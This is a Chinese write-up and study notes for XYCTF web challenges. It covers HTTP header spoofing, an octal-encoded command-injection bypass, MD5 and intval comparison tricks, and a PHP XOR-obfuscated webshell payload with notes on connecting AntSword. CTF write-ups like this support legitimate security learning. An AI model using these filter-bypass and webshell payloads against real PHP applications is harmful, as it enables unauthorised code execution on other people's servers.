XYCTF 部分wp及学习记录

news2024/12/29 9:02:25

1.ezmd5

根据题目提示

我们知道应该是要上传两张md5值相同的图片

根据原文链接:cryptanalysis - Are there two known strings which have the same MD5 hash value? - Cryptography Stack Exchange

把保存下来的图片上传一下

得到flag

2.ezhttp

根据原文链接:如何伪造http头,让后端认为是本地访问 - 技术栈

看页面源代码提示应该是要扫描后台

访问robots.txt

再访问

得到账号和密码

登录后

提示要伪造refer

bp抓包

发包过去又说要伪造XYCTF的浏览器

发包又提示要伪造本地用户

伪造X-Forwarded-For:127.0.01

那就只能换一个伪造

发包过去又说要伪造

伪造via

又说要伪造。。(崩溃了)

 那就是伪造cookie,把cookie的值改为XYCTF得到flag


XYCTF{83214032-3ef6-48ca-9a27-5ef6dd58ef8c}

知识点:

1.via伪造代理

2.client-ip和X-Forwarded-For的用处差不多

参考文章:鲜为人知的HTTP协议头字段详解大全 - 知乎

3.牢牢记住,逝者为大

第一层绕过,cmd的长度不能大于13

第二层绕过,cmd中不能有echo  exec  eval  system  fputs  .   /   \  字眼(这里/i就是大小写都识别)

第三层绕过,val_val中不能有bin  mv  cp  ls  |  f  a  l  ?  *  >  字眼

然后就是命令执行 #man,和cmd参数 和 manba out 拼接起来的命令

构造payload:

cp /var/www/html/88.txt

将其转换为八进制,结果为143 160 040 057 146 154 141 147 040 057 166 141 162 057 167 167 167 057 150 164 155 154 057 070 070 056 164 170 164 012

(为什么不转为16进制,主要是第三层绕过里面有过滤f,而我们转换的结果里面包含了f)

我们将八进制统一加上/0,得到

\0143\0160\0040\0057\0146\0154\0141\0147\0040\0057\0166\0141\0162\0057\0167\0167\0167\0057\0150\0164\0155\0154\0057\0070\0070\0056\0164\0170\0164\0012

我们构造payload的时候要注意,eval执行的第一个字符是注释符,所以我们要绕过注释符,用到换行符%0A,同时还要注释掉后面的manba out避免影响eval执行命令,所以这里用到%23,用&连接前后语句,用%24表示$,这样就会执行我们后面的语句

/?cmd=%0A`$_GET[1]`;%23&1=%24(echo -e "\0143\0160\0040\0057\0146\0154\0141\0147\0040\0057\0166\0141\0162\0057\0167\0167\0167\0057\0150\0164\0155\0154\0057\0070\0070\0056\0164\0170\0164\0012")

成功上传payload后

访问88.txt

得到flag

知识点:

1.> Linux cp命令主要用于复制文件或目录。

   语法:

cp [选项] 源文件 目标文件

2.> preg_match命令

模式分隔符后的"i"标记这是一个大小写不敏感的搜索

我的理解就是如果要用preg_match搜索多个字符串就用 |  连接

这里的 i 就是不管大写还是小写都识别,这里我们把 i 删了重新理解一下

3.> 各种进制的表达

在C语言里,整数有三种表示形式:十进制,八进制,十六进制。其中以数字0开头,由0~7组成的数是八进制。以0X或0x开头,由0~9,A~F或a~f 组成是十六进制。除表示正负的符号外,以1~9开头,由0~9组成是十进制。

十进制:除表示正负的符号外,以1~9开头,由0~9组成。如 128,+234,-278。

八进制:以0开头,由0~7组成的数。如 0126, 050000.

十六进制:以0X或0x开头,由0~9,A~F或a~f 组成。如 0x12A, 0x5a000。

4.> 我们要注意,如果要传入八进制数在url上,我们必须使用转义字符 \ 使其url能正确识别为八进制数,而不是当作普通的十进制数0xx来识别,但是这里还需要注意的是,在url上, \ 表示路径分隔符,为了url能将 \ 当做转义符号而不是路径分隔符,我们可以使用echo -e命令。

  • shell echo的各种用法

echo -e   // –e 在这里启用反斜杠转义的解释

详见:Shell echo命令 | 菜鸟教程

  • ` `  反引号中的命令当作shell命令执行

5.> url编码就是一个字符ascii码十六进制

回车,ASCII码13,"\r"
换行,ASCII码10,"\n",10的16进制是0xA,所以url编码是%0A
空格,ASCII码32,32的16进制是0x20,所以url编码是%20

# ,url编码是%23

4.warm up

第一层,如果val1和val2值不相等但是md5弱比较相等,输出ez

第二层,如果md5参数自身和自身的md5值相等,输出ezez

第三层,如果xy和xyctf弱比较相等,且xy不等于XYCTF_550102591,xy的md5值和XYCTF_550102591的md5值相等,则输level2 (这里有个相似的例题,可以参考buuctf朴实无华)

传入payload

利用到变量覆盖漏洞,我们这里直接给xyctf传入值就可以覆盖掉原先xyctf的值

/?XYCTF=QNKCDZO&val1[]=1&val2[]=2&md5=0e215962017&XY=QNKCDZO

得到提示访问LLeeevvveeelll222.php

代码审计一下

我们要intval函数转换结果不为0而且还要post传入的a中不包含0~9

就输出那一串文字,替换操作是通过调用 preg_replace($_GET['a'],$_GET['b'],$_GET['c']) 来实现的。其中,$_GET['a'] 是正则表达式模式,$_GET['b'] 是替换文本,$_GET['c'] 是要进行替换操作的目标文本

知识点:

1.echo(),print(),print_r()的区别

参考链接:PHP中echo(),print(),print_r()的区别及打印函数-CSDN博客

echo可以输出多个变量值,且没有返回值

print只有一个变量,作为一个字符串输出,有返回值1,且不能输出数组和对象,多用于打印字符串

print_r可以输出stirng、int、float、array、object等,输出array时会用结构表示,多用于打印复合类型,如数组。print_r打印关于变量的易于理解的信息。

echo是PHP语句

print和print_r是函数,语句没有返回值,函数可以有返回值(即便没有用)

print()    只能打印出简单类型变量的值(如int,string)
print_r() 可以打印出复杂类型变量的值(如数组,对象)
echo     输出一个或者多个字符串

例:

在代码中

换成print函数则变成了

2.preg_match函数

参考链接:正则表达式学习笔记(超级详细!!!)| 有用的小知识_1\d{2}-CSDN博客

  • 在正则中可以用一些简写字符

  • 在正则中可以用的一些标志(模式修饰符)

标志也叫模式修正符,因为它可以用来修改表达式的搜索结果。 这些标志可以任意的组合使用,它也是整个正则表达式中的一部分

  • 在正则中可以用的一些元字符
正则的语法参数

  • pattern参数

正则表达式模式通常以斜杠开头和结尾,例如 /pattern/

  • matches参数

是一个可选的输出参数,用于存储匹配到的结果。它是一个数组,其中每个元素对应一个匹配到的子模式(圆括号包裹的部分)

在函数调用后,如果匹配成功,$matches 数组将会被填充上匹配到的子串。第一个元素 $matches[0] 将包含整个匹配到的字符串,接下来的元素 $matches[1]$matches[2] 等将分别包含第一个、第二个圆括号包裹的子模式的匹配结果

例:

在代码中

在这个例子中,$matches[0] 包含整个匹配到的字符串,即 '12345789'。

正则的返回值

如果 pattern 匹配到指定 subject,则 preg_match() 返回 1,如果没有匹配到则返回 0, 或者在失败时返回 false

例:

3.extract函数

本函数用来将变量从数组中导入到当前的符号表中。常用于变量覆盖漏洞

       

4.preg_match绕过

扩展:有哪些常见的代码执行的函数?
(1)eval函数

把字符串code当作php代码执行

eval ( string $code ) : mixed

(2)assert函数

PHP5PHP7中,如果assertion是字符串,它将会被assert()当做PHP代码来执行。

PHP 5
assert ( mixed $assertion [, string $description ] ) : bool

PHP 7
assert ( mixed $assertion [, Throwable $exception ] ) : bool

数组绕过

preg_match只能处理字符串,当传入的subject是数组时会返回false

换行符绕过

.不会匹配换行符( \n )

例:

异或绕过

文章参考:命令执行中关于PHP正则表达式的一些绕过方法_正则表达式中过滤的怎么绕过-CSDN博客

在PHP中两个字符串异或之后,得到的还是一个字符串。如果正则过滤了一些字符串,那就可以使用两个不在正则匹配范围内的字符串进行异或得到我们想要的字符串。

例 echo '?' ^ '~' ;

运行结果为:A

异或绕过的原理
异或规则:

相同为0,不同为1

1 xor 1 =0

0 xor 0 =0

1 xor 0 =1

0 xor 1 =1

继续拿实例

echo ' ! ' ^ ' s ' ;  //运行结果为 r

!和 S 异或出来的  r

​可以把1理解为真,0理解为假;那么就可以把“&”理解为“与”,“|”理解为“或”;**而对于“^”则是相同为就0**
​回到做题上来,我们只要知道我们想要的字符的对应哪两个字符异或,只需要找到正则里没有过滤的字符异或得到我们想要的字符

这里我们可以看一下p神的payload、

在p神的代码中,' _ ' 和 '  __ ' 和 ' ___ ' 是 构造的变量(因为preg_match()过滤了所有的字母,我们只能用下划线来作变量名。)

p神用的语句是

(在PHP5当中assert()的作用和eval()相似都是执行,但是eval是因为是一个语言构造器而不是一个函数,不能被可变函数调用,所以这种拼接的方法只能用assert而不能用eval。只不过eval()只执行符合php编码规范的代码,PHITHON师傅这里还有就是使用 变量 进行payload拼接)

把payload拼接组合一下就是:(仅phpPHP 7.0.12及以下版本可以使用)

$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);

这里传入了shell=assert($_POST[ _ ]),由于"_"不受限制就可以任意传值了。(这里有一个误区,就是仅传入shell=$_POST[ _ ],这样的确最终代码是eval($_POST[ _ ])了,但当外面的eval执行了之后,就仅剩下一个$_POST[ _ ]了,所以不行

因为有很多不可打印字符,所以使用url编码表示
然后只需要在POST里面传参

_=phpinfo();      

可以蚁剑连接了,密码为_

这个payload经测试PHP 7.0.12及以下版本可以使用,碰到更高的版本可能assert()不能使用了,可以换成eval()

另外一种绕过方法

payload:

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

即 ​${_GET}{%ff}();&%ff=phpinfo

(这里是用 %ff%ff%ff%ff  %a0%b8%ba%ab 进行异或运算得到_GET)

任何字符与0xff异或都会取相反,这样就能减少运算量了。
注意:测试中发现,传值时对于要计算的部分不能用括号括起来,因为括号也将被识别为传入的字符串,可以使用{}代替,原因是php的use of undefined constant特性,例如${_GET}{a}这样的语句php是不会判为错误的,因为{}使用来 界定变量 的,这句话就是会将_GET自动看为字符串,也就是$_GET['a']

url编码取反绕过

我们可以构造payload:phpinfo();

此时我们就可以传入 (~%8F%97%8F%96%91%99%90)();

PHP利用PCRE回溯次数限制绕过某些安全限制

参考文章;PHP利用PCRE回溯次数限制绕过某些安全限制 | 离别歌

preg_match函数回溯次数上限默认是100万,我们可以通过发送超长字符串的方式,使正则返回bool(false)绕过限制

怎么修复PCRE带来的问题?

利用全等号===来判断返回值,这样即使返回了bool(false)也不会进入循环语句

5.intval函数绕过

intval函数用法:

参考文章:[WUSTCTF 2020]朴实无华:PHP 下的 intval 绕过技巧_intval( 绕过注入-CSDN博客

用于将其他类型的数据转化为整型数据

intval(mixed $value, int $base = 10): int

针对浮点数,intval函数采用的是“截断而非四舍五入”的方法

例如

intval函数的进制转换

intval() 函数的 $base 参数仅在 $value 参数的数据类型为 字符串 时生效

当我们需要将一个 采用 $base 进制的数值 转化为 十进制数值 时,需要 先将该数值转化为字符串 再交由 intval() 函数进行处理。

例如

实例是将八进制的3633转换为十进制,须为字符串类型时,才能生效转为十进制的1947

intval函数字符串解析规则(十进制)

intval函数字符串解析规则(其他进制)
扩充:二进制、八进制、十六进制的前缀
  • 0B (0b)表示二进制的前缀

例如:0B10101010111

  • 0O( 大写英文字母O) 表示八进制的前缀 (或者使用空格加上0 注意是空格加上0 即:" 0")

例如:" 076" 或者 "0O76"

  • 0x(0X)  表示十六进制的前缀

例如:0x18

intval函数字符串解析规则(科学计数法)

intval函数数组解析规则

转换数组类型时,不关心数组中的内容,只判断数组中有没有元素。

数组里面有元素,返回1

数组里面没有元素,返回0

取反

~取反符号

算数运算符

intval() 函数支持算数运算符,如果传入的 $var参数包含算数运算符,会先运算,再对运算结果进行转换。

intval函数绕过思路

参考文章:PHP intval()函数详解,intval()函数漏洞原理及绕过思路_intval函数-CSDN博客

1)当某个数字被过滤时,可以使用它的 8进制/16进制来绕过;比如过滤10,就用012(八进制)或0xA(十六进制)。
2)对于弱比较(a==b),可以给a、b两个参数传入空数组,使弱比较为true。
3)当某个数字被过滤时,可以给它增加小数位来绕过;比如过滤3,就用3.1。
4)当某个数字被过滤时,可以给它拼接字符串来绕过;比如过滤3,就用3ab。(GET请求的参数会自动拼接单引号)
5)当某个数字被过滤时,可以两次取反来绕过;比如过滤10,就用~~10。
6)当某个数字被过滤时,可以使用算数运算符绕过;比如过滤10,就用 5+5 或 2*5。

6.preg_replace \e模式下的代码执行

5.ezPOP

<?php
error_reporting(0);
highlight_file(__FILE__);

class AAA
{
    public $s;
    public $a;
    public function __toString()
    {
        echo "you get 2 A <br>";
        $p = $this->a;
        return $this->s->$p;
    }
}

class BBB
{
    public $c;
    public $d;
    public function __get($name)
    {
        echo "you get 2 B <br>";
        $a=$_POST['a'];
        $b=$_POST;
        $c=$this->c;
        $d=$this->d;
        if (isset($b['a'])) {
            unset($b['a']);
        }
        call_user_func($a,$b)($c)($d);
    }
}

class CCC
{
    public $c;

    public function __destruct()
    {
        echo "you get 2 C <br>";
        echo $this->c;
    }
}


if(isset($_GET['xy'])) {
    $a = unserialize($_GET['xy']);
    throw new Exception("noooooob!!!");
} 

6.ezMake

7.ezSerialize

8.ezRCE

知识点:

1.str_split

将字符串转换为数组

str_split(string $string, int $length = 1): array

例:

如果指定长度,则

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1617095.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

STM32H7的LCD控制学习和应用

STM32H7的LCD控制 LTDC基础硬件框图LTDC时钟源选择LTDC的时序配置LTDC背景层、图层1、图层2和Alpha混合LTDC的水平消隐和垂直消隐LCD的DE同步模式和HV同步模式的区别区分FPS帧率和刷新率避免LTDC刷新撕裂感的解决方法 驱动示例分配栈的大小MPU和Cache配置初始化SDRAM初始化LCD应…

鸿蒙 harmonyos 线程 并发 总结 async promise Taskpool woker(三)多线程并发 Worker

Worker Worker是与主线程并行的独立线程。创建Worker的线程称之为宿主线程&#xff0c;Worker自身的线程称之为Worker线程。创建Worker传入的url文件在Worker线程中执行&#xff0c;可以处理耗时操作但不可以直接操作UI。 Worker主要作用是为应用程序提供一个多线程的运行环境…

办公设备租赁行业内卷瞎扯

办公设备租赁行业内卷瞎扯 最近听到很多同行抱怨&#xff0c;现在市场太卷了&#xff0c;真的有点到了卷不死就往死里卷的节奏&#xff0c;让大家都开始想换地方&#xff0c;或者转行。但是今天&#xff0c;我想从另外一个角度聊一下这个问题&#xff0c;分析一下&#xff0c;…

苍穹外卖day9 (1)用户端历史订单

文章目录 前言用户端历史订单1. 查询历史订单1.1 业务规则1.2 接口设计1.3 代码实现 2. 查询历史订单详情2.1 接口设计2.2 代码实现 3. 取消订单3.1 业务规则3.2 接口设计3.3 代码设计 4. 再来一单4.1 业务规则4.2 接口设计4.3 代码实现 前言 用户端对历史订单的操作&#xff…

机器人系统开发ros2-基础学习16-使用 rosdep 管理依赖关系

1. what is rosdep? rosdep是一个依赖管理实用程序&#xff0c;可以与包和外部库一起使用。它是一个命令行实用程序&#xff0c;用于识别和安装依赖项以构建或安装包。 其本身rosdep并不是一个包管理器&#xff1b;它是一个元包管理器&#xff0c;它使用自己的系统知识和依赖…

Day10案例分页查询,条件查询

对要求进行逻辑分析,传递固定参数{page,pagesize}任意参数{name,gender,begin,end},返回总记录数以及当前页码的记录 不使用pagehelper插件,首先完成SQL语句 SQL语句 //固定头 <?xml version"1.0" encoding"UTF-8" ?> <!DOCTYPE mapperPUBLI…

SQL-DML数据操纵语言(Oracle)

文章目录 DML数据操纵语言常见的字段属性字符型字段属性char(n)varchar2(n)/varchar(n) 数值型字段属性number([p],[s]int 日期型字段属性DATEtimestamp 如何查看字段属性增加数据INSERT快捷插入 删除数据DELETE修改数据UPDATE DML数据操纵语言 定义 是针对数据做处理&#xf…

JavaScript中的map()方法详解

1. map() 的返回值是一个新的数组&#xff0c;新数组中的元素为 “原数组调用函数处理过后的值” 2. 简单使用&#xff1a;遍历整个数组&#xff0c;将大于4的元素乘以2 const array [2, 3, 4, 4, 5, 6]console.log("array",array) const map array.map(x > {…

【THM】Linux Privilege Escalation(权限提升)-初级渗透测试

介绍 权限升级是一个旅程。没有灵丹妙药,很大程度上取决于目标系统的具体配置。内核版本、安装的应用程序、支持的编程语言、其他用户的密码是影响您通往 root shell 之路的几个关键要素。 该房间旨在涵盖主要的权限升级向量,并让您更好地了解该过程。无论您是参加 CTF、参加…

什么?双核A7双网口核心板只要49?

“性价比之王” 触觉智能IDO-SOM2D0X系列基于SigmaStar SSD201/202 SoC的超小SOM模组&#xff0c;双核A7 1.2GHz主频&#xff0c;1080P视频解码&#xff0c;支持MIPI/RGB显示接口&#xff0c;支持双以太网&#xff0c;支持SDIO/USB/SPI/I2C/UART/DMIC/I2S&#xff0c;集成音频C…

跨平台手机号:微信手机号授权登录、微信授权登录双登录实现账户生态融合,新时代的身份密钥

小程序厂商的多样性体现在开发工具、服务领域、商业模式等多方面&#xff0c;各厂商凭借独特的技术优势、行业解决方案和市场策略&#xff0c;满足不同企业和用户需求。与此同时&#xff0c;随着移动互联网发展&#xff0c;手机号统一登录成为提升用户体验、简化登录流程的关键…

CTFshow-PWN-栈溢出(pwn36)

存在后门函数&#xff0c;如何利用&#xff1f; 好好好&#xff0c;终于到了这种有后门函数的了 checksec 检查一下&#xff1a; 32 位程序&#xff0c;RELRO 保护部分开启 RWX: Has RWX segments 存在可读可写可执行的段 使用 ida32 看 main 函数 跟进 ctfshow 函数…

T2I-Adapter:学习适配器为文本到图像扩散模型挖掘更多可控能力

文章目录 一、研究动机二、T2I-Adapter的特点三、模型方法&#xff08;一&#xff09;关于stable diffusion&#xff08;二&#xff09;适配器设计1、结构控制2、空间调色板3、多适配器控制 &#xff08;三&#xff09;模型优化训练期间的非均匀时间步采样 一、研究动机 T2I模…

安卓手机如何改ip地址?探索方法与注意事项

在数字时代&#xff0c;IP地址成为了我们在线身份的重要标识。对于安卓手机用户而言&#xff0c;了解如何修改IP地址可能涉及多种场景&#xff0c;那么&#xff0c;如何安全、有效地进行这一操作呢&#xff1f;下面将为您提供相关方法&#xff0c;并探讨修改IP地址时的注意事项…

国外问卷调查如何做?需要借助海外住宅IP吗?

在数字化时代&#xff0c;国外问卷调查不仅是了解市场需求的重要手段&#xff0c;还成为了一项能够赚取额外收入的方式。随着全球范围内消费者行为的多样化&#xff0c;各类企业和机构越来越需要了解不同地区的用户观点和偏好&#xff0c;以优化产品和服务。 一、国外问卷调查…

接口测试和Mock学习路线(中)

1.什么是 swagger Swagger 是一个用于生成、描述和调用 RESTful 接口的 WEB 服务。 通俗的来讲&#xff0c;Swagger 就是将项目中所有想要暴露的接口展现在页面上&#xff0c;并且可以进行接口调用和测试的服务。 现在大部分的项目都使用了 swagger&#xff0c;因为这样后端…

基于STM32实现流水灯【Proteus仿真】

详情更多 wechat&#xff1a;嵌入式工程师成长日记 https://mp.weixin.qq.com/s?__bizMzg4Mzc3NDUxOQ&mid2247485624&idx1&sn4e553234c2624777409bd2067a07aad8&chksmcf430de0f83484f6189b119d9d83ea6e6f2a85d13afaa04d218483918231c38e6382d3007061&tok…

【大语言模型LLM】- Meta开源推出的新一代大语言模型 Llama 3

&#x1f525;博客主页&#xff1a;西瓜WiFi &#x1f3a5;系列专栏&#xff1a;《大语言模型》 很多非常有趣的模型&#xff0c;值得收藏&#xff0c;满足大家的收集癖&#xff01; 如果觉得有用&#xff0c;请三连&#x1f44d;⭐❤️&#xff0c;谢谢&#xff01; 长期不…

【图说】VMware Ubuntu22.04 详细安装教程

前言 无论是从事 Linux 开发工作&#xff0c;还是希望电脑运行双系统&#xff0c;VMware 虚拟机都是我们日常工作不可或缺的工具。本章将会重点介绍 VMware 安装流程&#xff0c;以及在 VMware 上如何运行、使用 Ubuntu22.04 系统。 一、VMware 下载安装 1.1 VMware 官网下载…

使用虚拟信用卡订阅Starlink教程

Starlink 是由 SpaceX 公司开发的卫星互联网服务平台。它旨在通过将成千上万的卫星部署到地球轨道上&#xff0c;为全球范围内的用户提供高速互联网接入。通过 Starlink&#xff0c;用户可以通过卫星连接接入互联网&#xff0c;无需依赖传统的地面基础设施&#xff0c;这对于偏…